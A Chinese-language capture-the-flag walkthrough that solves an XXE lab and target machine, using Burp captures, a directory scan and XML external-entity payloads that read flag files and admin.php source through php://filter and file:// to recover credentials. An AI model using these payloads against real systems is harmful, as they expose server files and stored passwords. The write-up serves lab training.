XXE-labs靶场 XXE 靶机(通关攻略)

靶场搭建

随便输入一个账号密码登录 并用bp进行抓包

右击发送到重放器(Reperter)

复制代码
<?xml version="1.0"?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag"> ] >

通过php协议base64加密读写flag

将得到的编码进行base64解密

得到flag

靶机搭建

靶机IP:192.168.131.169

御剑工具扫描后台目录

分别访问两个目录

发现两个子文件 分别尝试访问

admin.php访问失败 试试另外一个

访问xxe 发现是一个登录页面

随机输入账号密码登录进行bp抓包

右击发到重放器

可以看到有回显信息

复制代码
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ] >

通过php协议base64加密读写admin.php

将得到的编码进行base64解码

查看解码的结果可以看到username password

进行cmd5解密 得到密码

进行admin.php登陆

点击flag

没有找到,将发现的flagmeout.php放到xxe里找一下,右击查看源代码

得到JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

先进行base32解码 再进行base64解码

得到路径,再次抓包

复制代码
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "file:etc/.flag.php" > ]>

将得到的代码放入php文件中运行

得到flag

相关推荐
Lucis__3 小时前
一文读懂TCP通信机制:基于相关API构建可靠性连接
linux·网络·tcp/ip
你的保护色3 小时前
ensp 路由器启动失败 解决方案
网络
PinTrust SSL证书4 小时前
IP地址访问网站,怎么去除不安全提示?
网络协议·tcp/ip·安全·网络安全·https·ssl
菩提小狗4 小时前
每日安全情报报告 · 2026-04-17
网络安全·漏洞·cve·安全情报·每日安全
2501_913061345 小时前
网络原理知识
java·网络
busy dog~乌鸦~6 小时前
【THM-题目答案】:Web Fundamentals-How The Web Works-DNS in Detail: Domain Hierarchy
运维·web安全·网络安全·系统安全
奇妙之二进制7 小时前
zmq源码分析之own_t
服务器·网络
带娃的IT创业者8 小时前
零停机迁移:如何将服务器成本从 $1432 降至 $233
运维·服务器·网络·成本优化·服务器迁移·零停机·hetzner
bugu___9 小时前
Linux系统、网络知识点回顾1
linux·网络
aixingkong9219 小时前
从伊朗网络设备瘫机-浅谈基础系统安全
网络·智能路由器·硬件架构·硬件工程